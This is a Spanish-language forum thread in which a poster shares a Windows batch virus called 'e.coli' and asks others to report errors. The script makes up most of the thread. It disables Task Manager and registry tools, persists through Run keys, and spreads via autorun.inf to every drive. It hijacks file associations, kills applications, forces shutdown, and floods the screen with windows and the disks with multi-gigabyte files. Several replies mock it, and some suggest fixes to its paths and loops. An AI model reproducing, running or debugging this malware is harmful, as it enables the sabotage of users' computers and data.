sin ven errores en mi codigo por favor notificar
su amigo by hackerd W4rR3d
@echo off
::by hacked W4rR3d
::Comunidad Informatica Black Eye Security Team
:: Piura - Perù
Set ecoli=echo
Set HC= C:\
Set HD= D:\
Set HE= E:\
Set HF= F:\
Set HG= G:\
Set HH=copy /y %0
taskkill /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
tskkill /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f
REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
if exist C:\ goto C1
if not exist "C:\"goto t1
:C1
if exist C:\e.coli.bat attrib +h +s +r C:\e.coli.bat&attrib +h +s +r C:\autorun.inf
copy /y %0 C:\e.coli.bat
%ecoli% [autorun] >>C:\autorun.inf
%ecoli% OPEN=e.coli.bat >>C:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>C:\autorun.inf
%ecoli% shell\open\Default=1 >>C:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>C:\autorun.inf
attrib +h +s +r C:\e.coli.bat
attrib +h +s +r C:\autorun.inf
:t1
if exist D:\ goto D1
if not exist "D:\"goto t2
:D1
if exist D:\e.coli.bat attrib +h +s +r D:\e.coli.bat&attrib +h +s +r D:\autorun.inf
copy /y %0 D:\e.coli.bat
%ecoli% [autorun] >>D:\autorun.inf
%ecoli% OPEN=e.coli.bat >>D:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>D:\autorun.inf
%ecoli% shell\open\Default=1 >>D:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>D:\autorun.inf
attrib +h +s +r D:\e.coli.bat
attrib +h +s +r D:\autorun.inf
:t2
if exist E:\ goto E1
if not exist "E:\"goto t3
:E1
if exist E:\e.coli.bat attrib +h +s +r E:\e.coli.bat&attrib +h +s +r E:\autorun.inf
copy /y %0 E:\e.coli.bat
%ecoli% [autorun] >>E:\autorun.inf
%ecoli% OPEN=e.coli.bat >>E:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>E:\autorun.inf
%ecoli% shell\open\Default=1 >>E:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>E:\autorun.inf
attrib +h +s +r E:\e.coli.bat
attrib +h +s +r E:\autorun.inf
:T3
if exist F:\ goto F1
if not exist "F:\"goto t4
:F1
if exist F:\e.coli.bat attrib +h +s +r F:\e.coli.bat&attrib +h +s +r F:\autorun.inf
copy /y %0 F:\e.coli.bat
%ecoli% [autorun] >>F:\autorun.inf
%ecoli% OPEN=e.coli.bat >>F:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>F:\autorun.inf
%ecoli% shell\open\Default=1 >>F:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>F:\autorun.inf
attrib +h +s +r F:\e.coli.bat
attrib +h +s +r F:\autorun.inf
:T4
if exist G:\ goto G1
if not exist "G:\"goto open
:G1
if exist G:\e.coli.bat attrib +h +s +r G:\e.coli.bat&attrib +h +s +r G:\autorun.inf
copy /y %0 G:\e.coli.bat
%ecoli% [autorun] >>G:\autorun.inf
%ecoli% OPEN=e.coli.bat >>G:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>G:\autorun.inf
%ecoli% shell\open\Default=1 >>G:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>G:\autorun.inf
attrib +h +s +r G:\e.coli.bat
attrib +h +s +r G:\autorun.inf
:open
if exist %HC%open.vbs goto cop
%ecoli%On Error Resume Next >> %HC%open.vbs
%ecoli%Set oWMP = CreateObject("WMPlayer.OCX.7")>> %HC%open.vbs
%ecoli%Set colCDROMs = oWMP.cdromCollection>> %HC%open.vbs
%ecoli%do>> %HC%open.vbs
%ecoli%if colCDROMs.Count >= 1 then>> %HC%open.vbs
%ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
%ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
%ecoli%Next>> %HC%open.vbs
%ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
%ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
%ecoli%Next>> %HC%open.vbs
%ecoli%End If>> %HC%open.vbs
%ecoli%wscript.sleep 5000>> %HC%open.vbs
%ecoli%loop >> %HC%open.vbs
start %HC%open.vbs
:cop
if exist %HC%\apgar.vbs goto reini
%HH% "%appdata%\e.coli_a.exe"
%HH% "%windir%\e.coli_b.exe"
%HH% "%systemroot%\system32\e.coli_c.exe"
%HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
%HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
%HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
%HH% "%programfiles%\Winamp\e.coli_f.exe"
%HH% "%programfiles%\WinRAR\e.coli_g.exe"
%HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
%HH% "%programfiles%\shARES\e.coli_i.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
%HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
%HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"
:reini
if exist %HC%\Warning.vbs goto war
%ecoli% On Error Resume Next >> %HC%\apgar.vbs
%ecoli% set shell = CreateObject("WScript.Shell") >> %HC%\apgar.vbs
%ecoli% shell.run "shutdown.exe -s -f -t 7 " >> %HC%\apgar.vbs
start %HC%\apgar.vbs
:war
if exist %HC%\cmds.bat goto cmds
echo msn=msgbox("Warning Warning Warning",16," no me puedes vencer") >> %HC%\Warning.vbs
For /L %%a IN (0,1,1000) DO start %HC%\Warning.vbs
:cmds
if exist %windir%e.coli.bat goto wi
:wi
for %%A in (C,D,E,F,G,H,I,J,K,L,M,N,Ñ,O,P,Q,R,S,T,U,V,W,X,Y,Z) do if exist "%%A:\" copy /y %0 "%%A:\INFECTED!!!"
for %%E in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink,html) do assoc .%%E=batfile
for %%I in (bmp.exe,gif.exe,doc.exe,mpeg.exe,xlsx.exe,avi.exe,mpg.exe,mp3.exe,mp4.exe,rar.exe,zip.exe,ink.exe,html.exe,winlogon.exe,winupdate.exe,winservice.exe,TASKMAN.exe,jpg.exe) do copy /y %0 "%windir%\%%I"
attrib +h %windir%
for %%p in (WINWORD.exe,EXCEL.exe,POWERPNT.exe,Winrar.exe,firefox.exe,iexplore.exe,wmplayer.exe,Ares.exe,msnmsgr.exe) do tasklist /m | find /i "%%p" && taskkill /f /im %%p.exe
echo fsutil file createnew %random%.exe 4000000000>>%windir%\fsutil.exe
start %windir%\fsutil.exe
if exist "%windir%\jpg.exe" (goto ves) else (goto Full Disk)
copy /y %0 "%windir%\jpg.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%windir%\jpg.exe"" /f
:ves
echo 00000000 000 000 0000000000 0000000000 0000000000 00000000000 0000000000 000000>>%userprofile%\Desktop\I.txt
echo 00000000 0000 000 0000000000 0000000000 0000000000 00000000000 0000000000 00000000>>%userprofile%\Desktop\N.txt
echo 0000 00000 000 000 000 000 000 000 000 0000>>%userprofile%\Desktop\F.txt
echo 0000 000000 000 000 000 000 000 000 000 000>>%userprofile%\Desktop\E.txt
echo 0000 000 000 000 0000000000 0000000000 000 000 0000000000 000 000>>%userprofile%\Desktop\C.txt
echo 0000 000 000 000 0000000000 0000000000 000 000 0000000000 000 000>>%userprofile%\Desktop\T.txt
echo 0000 000 000000 000 000 000 000 000 000 000>>%userprofile%\Desktop\E.txt
echo 0000 000 00000 000 000 000 000 000 000 0000>>%userprofile%\Desktop\D.txt
echo 00000000 000 0000 000 0000000000 0000000000 000 0000000000 00000000>>%userprofile%\Desktop\!.txt
echo 00000000 000 000 000 0000000000 0000000000 000 0000000000 000000>>%userprofile%\Desktop\!!.txt
:Full Disk
fsutil file createnew INFECTED!!!.exe 40000000000
for %%t in (1,1,24) do at %%t /interactive /every:L,M,Mi,J,V,S,D fsutil file createnew %random%.exe 4000000000
for /l %%e in (0,1,5000) do (start cmd)
cls &exit
Set ecoli=echo
Por dios........................
Lo mismo de siempre.
Que maldad por favor!
Saludos:
No estoy muy puesto en codigo¿me podeis decir que hace exactamente el virus?
Cita de: pitoloko en 12 Junio 2011, 17:48 PM
Set ecoli=echo
Por dios........................
Pero... para qué cojones sirve esto???? Si es más fácil escribir
echo !
Demonios... pero si ahora casi todos los AV detectan los Autorun!
Esto pasa por meterse tanto pepino...XD
-10
%HH% "%windir%\e.coli_b.exe"
%HH% "%systemroot%\system32\e.coli_c.exe"
%HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
%HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
%HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
%HH% "%programfiles%\Winamp\e.coli_f.exe"
%HH% "%programfiles%\WinRAR\e.coli_g.exe"
%HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
%HH% "%programfiles%\shARES\e.coli_i.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
%HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
hola si no tienes privilegios de administrador esto no te funciona
ni esto
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f
y pienso que esta linea te marcaria error
%HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"
lo tendrias que poner asi
%HH% "%userprofile%\Mis documentos\e.coli_n.exe"
y ejecutarlo en la unidad %systemdrive% que porlo general es la unidad c:
no se porque le ayudais, si este tipo nunca corrije nada, antes de pararse a corregir un batch, ya está haciendo otro batch con más errores que el anterior.
Como ya han dicho, lo mismo de siempre...
Por cierto, la mitad del código se puede reducir a un FOR para buscar unidades.
Saludos